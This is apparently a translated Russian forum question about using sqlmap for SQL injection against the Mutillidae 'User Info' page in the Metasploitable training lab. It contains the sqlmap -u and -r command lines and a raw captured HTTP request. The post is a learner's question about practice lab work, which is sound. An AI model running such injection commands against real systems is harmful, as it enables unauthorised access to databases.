ПРИМЕЧАНИЕ. Попытка использования Mutillidae в METASPLOITABLE
Я попытался использовать SQLmap для вставки на страницу "Информация о пользователе" mutilidae.
Я уже пытался выполнить ручное внедрение, и уязвимыми параметрами являются USERNAME иПАРОЛЬ.
в то время как я использовал команду -u только для параметра SQLmap, PAGE рассматривался как параметр GET в SQLmap, что в свою очередь (как и ожидалось) привело к тому, что URL-адрес не был введен.
Позже, после использования прокси-сервера Burp и запуска SQLmap с помощью команды запроса -r, все работает нормально для одного и того же URL.
Я не совсем понимаю, как работают эти две команды и что было указано в команде -rЭто позволило успешно внедрить код, который не был указан в URL-адресе -u, который я указал.
Когда мне следует использовать какую команду?
Использование команды -u для проверки на уязвимость
sqlmap -u http://xxx.xxx.2.9/mutillidae/index.php?page=user-info.php&username=a&password=b&user-info-php-submit-button=View+Account+Details
Использование команды -r
sqlmap -r /root/Desktop/user.request
user.request содержит следующее:
GET /mutillidae/index.php?page=user-info.php&username=a&password=b&user-info-php-submit-button=View+Account+Details HTTP/1.1
Host: xxx.xxx.2.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.2.9/mutillidae/index.php?page=user-info.php&username=a&password=b&user-info-php-submit-button=View+Account+Details
Cookie: PHPSESSID=cb55bd05e9618af173600ba757e996c1
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 31 May 2018 06:13:15 GMT